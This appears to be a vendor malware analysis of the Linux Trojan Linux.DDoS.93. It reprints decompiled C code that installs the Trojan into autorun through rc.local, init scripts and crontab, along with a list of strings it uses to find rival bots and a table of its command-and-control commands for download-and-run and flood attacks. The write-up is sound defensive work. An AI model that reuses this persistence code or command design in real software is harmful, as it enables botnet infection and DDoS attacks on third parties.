SHA1:
- f164721acd2e5dabaa2b802946162cbaac48aa5e (x64)
- 76d7a2f1fcc3eeb398bba416ac5cc78072780367 (x64)
- c3b5310eca6dce452c42e5db14a852d42b08f559 (armv6l)
The Trojan for Linux designed to carry out DDoS attacks. It is spread presumably via ShellShock vulnerabilities.
At launching, it checks for the presence of /var/run/dhcpclient-eth0.pid. file. If the Trojan cannot find this file, it attempts to register itself in autorun.
void __cdecl startup()
{
char self_path[1023]; // [sp+0h] [bp-414h]@1
int v1; // [sp+400h] [bp-14h]@1
FILE *stream; // [sp+404h] [bp-10h]@3
char v3[12]; // [sp+408h] [bp-Ch]@2
v1 = readlink("/proc/self/exe", self_path, 0x3FFu);
if ( v1 != -1 )
{
v3[v1 - 0x408] = 0;
if ( geteuid() )
goto LABEL_16;
stream = fopen("/etc/rc.local", "w");
if ( stream )
{
fprintf(stream, "#!/bin/sh -e\n%s\nexit 0", self_path);
fclose(stream);
return;
}
if ( !access("/etc/init.d", 0) )
{
rename(self_path, "/etc/init.d/dhcpclient-eth0");
system("update-rc.d dhcpclient-eth0 defaults");
return;
}
if ( !access("/etc/init", 0) )
{
stream = fopen("/etc/init/dhcpclient-eth0.conf", "w");
if ( stream )
{
fprintf(stream, "description \"dhcp client\"\nstart on startup\ntask\nexec %s", self_path);
fclose(stream);
return;
}
}
stream = fopen("/etc/crontab", "a");
if ( !stream )
{
LABEL_16:
system("crontab -l > tempcrontab");
stream = fopen("tempcrontab", "a");
if ( stream )
{
fprintf(stream, "\n@reboot %s\n", self_path);
fclose(stream);
system("crontab tempcrontab");
remove("tempcrontab");
}
}
else
{
fprintf(stream, "\n@reboot root %s\n", self_path);
fclose(stream);
}
}
}After that, the Trojan write-protects the /var/run/dhcpclient-eth0.pid file and disguises its own name under “-sha”. Then the Linux.DDoS.93 reads the process’s memory contents and lists executable files of the processes, using /proc, in order to find other Trojan copies. The process terminates if it matches one of the strings below.
signatures dq offset aPrivmsg ; DATA XREF: dump_memory+1A0r
.data:00000000006066C0 ; dump_file+ABr
.data:00000000006066C0 ; "privmsg"
.data:00000000006066C8 dq offset aGetlocalip ; "getlocalip"
.data:00000000006066D0 dq offset aKaiten ; "kaiten"
.data:00000000006066D8 dq offset aBrianKrebs ; "brian krebs"
.data:00000000006066E0 dq offset aBotnet ; "botnet"
.data:00000000006066E8 dq offset aBitcoinMine ; "bitcoin mine"
.data:00000000006066F0 dq offset aLitecoinMine ; "litecoin mine"
.data:00000000006066F8 dq offset aRootkit ; "rootkit"
.data:0000000000606700 dq offset aKeylogger ; "keylogger"
.data:0000000000606708 dq offset aDdosing ; "ddosing"
.data:0000000000606710 dq offset aNulling ; "nulling"
.data:0000000000606718 dq offset aHackforums ; "hackforums"
.data:0000000000606720 dq offset aSkiddie ; "skiddie"
.data:0000000000606728 dq offset aScriptKiddie ; "script kiddie"
.data:0000000000606730 dq offset aBlackhat ; "blackhat"
.data:0000000000606738 dq offset aWhitehat ; "whitehat"
.data:0000000000606740 dq offset aGreyhat ; "greyhat"
.data:0000000000606748 dq offset aGrayhat ; "grayhat"
.data:0000000000606750 dq offset aDoxing ; "doxing"
.data:0000000000606758 dq offset aMalware ; "malware"
.data:0000000000606760 dq offset aBootkit ; "bootkit"
.data:0000000000606768 dq offset aRansomware ; "ransomware"
.data:0000000000606770 dq offset aSpyware ; "spyware"
.data:0000000000606778 dq offset aBotkiller ; "botkiller"
The Trojan generates its identifier that looks as follows: [A-Z0-9]{20}.
After that the Linux.DDoS.93 creates two child processes. The first one exchanges data with a command and control server. The second one verifies the parent process is running in an infinite loop (if not, launches it). The parent process then does the same for the child process—thus the Trojan works continuously on the infected computer.
The module executes the following commands:
| Command | Parameters | Purpose |
|---|---|---|
| DNX | Host URL | Download and run the file. It is saved with the name getbinaries |
| GET | Host port page time | Launch a HTTP flood attack using GET requests |
| HEAD | Host port page time | Launch a HTTP flood attack using HEAD requests |
| PING | Send a PING command | |
| POST | Host port page time postparams | Launch a HTTP flood attack using POST requests |
| RCD | Host port time | Launch a TCP flood attack (random data up to 4096 B long is added to the packages) |
| RUDP | Host time | Launch a UDP flood attack on a random port |
| SCANNER | Method port page params useragent | Send HTTP requests with the specified parameters to 255 random IP addresses |
| SUDP | Host port time | Launched a Spoofed UDP flood attack |
| TCP | Host port time | Launch a TCP flood attack |
| TERMINATE | Terminate execution | |
| UDP | Host port time | Launch a UDP flood attack on a specified port |
| UNINSTALL | Remove itself | |
| UPDATE | Host URL | Download and run the file. It is saved with the name getbinaries |
When the Trojan receives the command to launch a DDoS attack or a SCANNER, command, it first stops all the child processes and then launches 25 new ones which perform a scan or an attack in a way chosen by the cybercriminals.